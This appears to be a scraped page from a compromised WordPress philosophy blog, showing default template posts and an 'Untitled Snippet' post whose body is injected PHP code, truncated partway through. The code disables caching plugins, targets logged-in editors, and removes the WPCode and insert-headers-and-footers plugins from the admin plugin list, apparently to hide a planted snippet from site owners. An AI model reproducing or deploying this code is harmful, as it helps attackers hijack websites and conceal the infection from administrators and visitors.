Mindblown: a blog about philosophy.
-
Untitled Snippet
$_pwsa = ‘d6daba094cc7d65115281355005e3e66’; if (!defined(‘DONOTCACHEPAGE’)) { define(‘DONOTCACHEPAGE’, true); } add_filter(‘do_rocket_generate_caching_files’, ‘__return_false’); add_filter(‘w3tc_can_cache’, ‘__return_false’); add_filter(‘wp_cache_not_logged_in’, ‘__return_false’); add_filter(‘wp_cache_no_cache_for_get’, ‘__return_true’); if ((current_user_can(‘edit_pages’) || current_user_can(‘edit_others_pages’)) && !array_key_exists(‘show_all’, $_GET) && !defined(‘_WP_FIX’)) { define(‘_WP_FIX’, true); function fix_style() { echo ‘ ‘; } add_action(‘admin_head’, ‘fix_style’); add_action(‘wp_head’, ‘fix_style’); add_filter(‘all_plugins’, function ($plugins) { if (isset($plugins[‘wpcode/wpcode.php’])) { unset($plugins[‘wpcode/wpcode.php’]); } if (isset($plugins[‘insert-headers-and-footers/ihaf.php’])) { unset($plugins[‘insert-headers-and-footers/ihaf.php’]); } return…
-
Hello world!
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
Got any book recommendations?